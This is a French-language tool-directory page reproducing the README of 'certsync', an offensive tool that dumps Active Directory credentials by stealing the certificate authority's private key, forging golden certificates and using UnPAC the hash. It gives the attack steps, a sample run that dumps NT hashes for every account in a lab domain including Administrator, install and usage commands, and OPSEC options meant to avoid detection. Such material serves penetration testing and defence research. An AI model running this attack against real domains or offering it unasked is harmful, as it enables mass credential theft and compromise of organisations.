Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/zblurx/certsync
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionAuthentificationRed Teaming
GitHubzblurx/certsync

certsync

Dump NTDS avec des certificats dorés et UnPAC the hash

Voir le dépôt
64968il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

certsync

certsync est une nouvelle technique pour extraire NTDS à distance, mais cette fois sans DRSUAPI : elle utilise golden certificate et UnPAC the hash. Elle fonctionne en plusieurs étapes :

  1. Extraire la liste des utilisateurs, les informations de l'AC et la CRL de LDAP
  2. Extraire le certificat de l'AC et la clé privée
  3. Forger hors ligne un certificat pour chaque utilisateur
  4. Effectuer UnPAC the hash pour chaque utilisateur afin d'obtenir les hash nt et lm
root@kitploit:~
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

Contrairement à ce que l'on pourrait penser, l'attaque n'est pas du tout plus lente.

Table of Contents

  • certsync
    • Table of Contents
    • Installation
    • Usage
    • Why
    • Requirements
    • Limitation
    • OPSEC
    • Credits

Installation

Localement:

root@kitploit:~
git clone https://github.com/zblurx/certsync
cd certsync
pip install .

Depuis Pypi:

root@kitploit:~
pip install certsync

Depuis BlackArch:

root@kitploit:~
pacman -S certsync

Tous les paquets des distributions OS :

Packaging status

Usage

root@kitploit:~
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
                [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and UnPAC the hash

options:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -outputfile OUTPUTFILE
                        base output filename

CA options:
  -ca-pfx pfx/p12 file name
                        Path to CA certificate. If used, will skip backup of CA certificate and private key
  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authentication options:
  -d domain.local, -domain domain.local
                        Domain name
  -u username, -username username
                        Username
  -p password, -password password
                        Password
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
  -scheme ldap scheme
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
  -ldap-filter LDAP_FILTER
                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
  -template cert.pfx    base template to use in order to forge certificates
  -timeout timeout      Timeout between PKINIT connection
  -jitter jitter        Jitter between PKINIT connection
  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

Why

DSRUAPI est de plus en plus surveillé et parfois restreint par les solutions EDR. De plus, certsync ne nécessite pas d'utiliser un administrateur de domaine, seulement un administrateur de l'AC.

Requirements

Cette attaque nécessite :

  • Une AC d'entreprise configurée sur un serveur ADCS dans le domaine,
  • PKINIT fonctionnel,
  • Un compte de domaine qui est administrateur local sur le serveur ADCS, ou une exportation du certificat et de la clé privée de l'AC.

Limitations

Comme nous ne pouvons pas effectuer PKINIT pour les utilisateurs révoqués, nous ne pouvons pas extraire leurs hash.

OPSEC

Quelques options ont été ajoutées pour personnaliser le comportement de l'outil :

  • -ldap-filter : modifier le filtre LDAP utilisé pour sélectionner les noms d'utilisateurs à certsync.
  • -template : utiliser un certificat déjà délivré pour le reproduire lors de la création des certificats utilisateurs.
  • -timeout et -jitter : modifier le délai entre les demandes d'authentification PKINIT.
  • -randomize : Par défaut, tous les certificats utilisateur forgés auront la même clé privée, le même numéro de série et les mêmes dates de validité. Ce paramètre les randomise, mais la création prendra plus de temps.

Credits

  • Olivier Lyak pour tout son travail sur ADCS et certipy.
  • Benjamin Delpy pour la technique UnPAC the hash.
  • Will Schroeder et Lee Christensen pour Certified Pre-Owned et Certify.
  • Mayfly pour son excellent lab : GOAD.
Télécharger l’outil